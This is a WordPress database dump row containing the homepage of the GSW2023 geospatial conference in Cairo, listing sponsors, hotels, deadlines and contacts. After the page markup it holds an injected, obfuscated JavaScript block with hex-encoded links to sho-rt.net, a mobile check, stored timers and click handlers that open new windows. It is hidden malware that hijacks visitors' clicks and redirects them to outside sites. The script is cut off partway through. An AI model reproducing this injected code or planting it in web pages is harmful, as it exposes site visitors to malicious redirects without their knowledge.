(4701,1,'2023-06-14 10:51:04','2023-06-14 10:51:04','','hexagon_new','','inherit','open','closed','','hexagon_new','','','2023-06-14 10:51:04','2023-06-14 10:51:04','',3066,'https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new.jpg',0,'attachment','image/jpeg',0),
(4702,1,'2023-06-14 10:52:41','2023-06-14 10:52:41','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609158984{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609109195{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686739891630{margin-top: 5px !important;}\"]&nbsp;</p>\n<p><a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969841504{margin-top: 20px !important;}\"]<a href=\"www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345447550{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345389553{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"> </a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345510625{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"3/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1686350035719{margin-top: 190px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1684379817578{margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 24pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"328\" height=\"185\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684379884193{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/2\" awb_type=\"image\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][/vc_column][vc_column][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]&nbsp;</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> .</strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var 